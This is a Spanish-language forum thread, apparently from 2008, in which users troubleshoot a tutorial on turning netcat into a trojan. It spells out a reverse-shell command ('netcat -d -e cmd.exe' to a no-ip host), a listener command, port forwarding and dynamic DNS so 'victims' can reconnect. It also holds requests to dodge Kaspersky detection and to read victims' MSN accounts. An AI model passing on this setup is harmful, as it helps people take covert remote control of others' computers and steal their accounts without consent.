D4RIO
"ser el mejor no es suficiente" - slackbyte
|
O te podes bajar una buena utilidad de consola para la edicion del registro, o programar una xD:::
|
|
|
|
|
|
Linux Registred User #452001 : : 0010 0100 - HS CODING : :
|
|
|
luar123
|
hola mi pregunta es la siguiente: en la parte del troyano donde hay que colocar la ip se debe poner la ip publica o la ip pribada, y si se debe abrir el puerto en el router espero me puedan despejar estas dudas. gracias
|
|
|
|
|
|
|
|
|
Novlucker
|
Debes de poner al ip pública, y en el router mapear el puerto que hayas configurado, hacía la ip privada/interna.  Saludos
|
|
|
|
|
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein
|
|
|
KalmeniduS
|
hola que tal, exelentemente explicado, pero tengo un problema, en el equipo victima todo bien me da un pantallaso de la consola y crea el archivo en la carpeta update. Pero a la hora de abrir la consola y escrbibir "nc -vv -L -p 80" no hace nada, dice escuchando puerto y queda asi para siempre. si me pudieras decir que hago mal estaria buenisimo. Desde ya gracias
|
|
|
|
|
|
|
|
|
|
|
Novlucker
|
hola que tal, exelentemente explicado, pero tengo un problema, en el equipo victima todo bien me da un pantallaso de la consola y crea el archivo en la carpeta update. Pero a la hora de abrir la consola y escrbibir "nc -vv -L -p 80" no hace nada, dice escuchando puerto y queda asi para siempre Lo estas haciendo con conexion inversa?? Porque si es así el nc de la víctima ha intentado conectarse a tu pc y resulta ser que tu te has puesto a la escucha luego de esto, cuando el nc de la victima intentó conectarse no había nadie del otro lado  Saludos [Edito]: vitaepe, piensa que la mayoría de las personas utilizan windows, si lo que quieres son los comandos de linux simplemente teclea nc -h en Ubuntu para ver la ayuda, verás que son prácticamente iguales
|
|
|
|
« Última modificación: 28 Enero 2008, 21:46 por Novlucker »
|
|
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y del Universo no estoy seguro." Albert Einstein
|
|
|
darkirax
|
hola me e leido el tutorial pero me surgio una duda
yo tengo ip dinamica osea k despues de configurar el netcat k le voy a enviar i todo cuando me canvie la ip ya no voy a tener conexion como podria solucionar eso??
|
|
|
|
|
|
|
|
|
Novlucker
|
Si tienes ip dinámica create una cuenta en no-ip y ya no tendrás ningún tipo de problemas
Saludos
|
|
|
|
|
|
|
|
|
darkirax
|
ola gracias por la respuesta ya me e creado una cuenta en no-ip pero me pueden decir k hace exactamente i como lu utilizo para k no me canvia la ip?
gracias
|
|
|
|
|
|
|
|
|
¹4¹²
|
Alguien podria poner comados para el manual 1 (troyanizando netcat) para ver las cuentas de msn? Q otros comandos se pueden usar?Cuales son? SAlu2
|
|
|
|
|
|
...El Ladrón es un artista creativo capaz de crear robos asombrosos, mientras que el Detective se dedica a reconstruir su trabajo; lo que lo convierte en un mero crítico... 
|
|
|
Novlucker
|
ola gracias por la respuesta ya me e creado una cuenta en no-ip pero me pueden decir k hace exactamente i como lu utilizo para k no me canvia la ip?
gracias
Aquí tienes la explicación - MANUAL NO-IPSaludos
|
|
|
|
« Última modificación: 05 Febrero 2008, 23:12 por Novlucker »
|
|
|
|
|
|
|
darkirax
|
hola tengo un pekenyo problemillacon el netcat e creado una cuenta no-ip i e creado el host en mi ordenador abro el no ip i le doy el clic en el host luego en otro ordenador k tengo en mi casa le pongo el netcat -d -e cmd.exe darkirax.no-ip.org 80 i en mi pc le pongo en escucha al puerto 80 pero no ocurre nada... k hago mal?
si en vez de poner el host del mi ip pongo mi ip interna si k anda pero esto no me servira para gente k no este en mi red
espero respuesta
gracias
|
|
|
|
|
|
|
|
|
Straust
shalom
|
Ehholas, ahi disculpan si el comentario esta repetido pero es que es muy largo y necesito publicar esto rapido: el problemita es que esta semana ensayando lo de troyanizar el NetCat con un amigo y resulta que el tiene el antivirus karspersky y ese antivirus me detecta el NetCa como un rootshell, entonces como hago para que no lo detecte??
salu2!! grax
|
|
|
|
|
|
Dificil es la vida de aquel que no conoce el motivo de su existencia
|
|
|
K-19
Sarah Wayne
|
hola tengo un pekenyo problemillacon el netcat e creado una cuenta no-ip i e creado el host en mi ordenador abro el no ip i le doy el clic en el host luego en otro ordenador k tengo en mi casa le pongo el netcat -d -e cmd.exe darkirax.no-ip.org 80 i en mi pc le pongo en escucha al puerto 80 pero no ocurre nada... k hago mal?
si en vez de poner el host del mi ip pongo mi ip interna si k anda pero esto no me servira para gente k no este en mi red
espero respuesta
gracias
Prueba a usar otro puerto que no sea el 80, el puerto 80 es usado por los navegadores y para protocolo http, asi que molestate en usar otro puerto, esto esta muy tratado ya, usa uno del tipo 2000 o asi.
|
|
|
|
|
|
|
|
|
|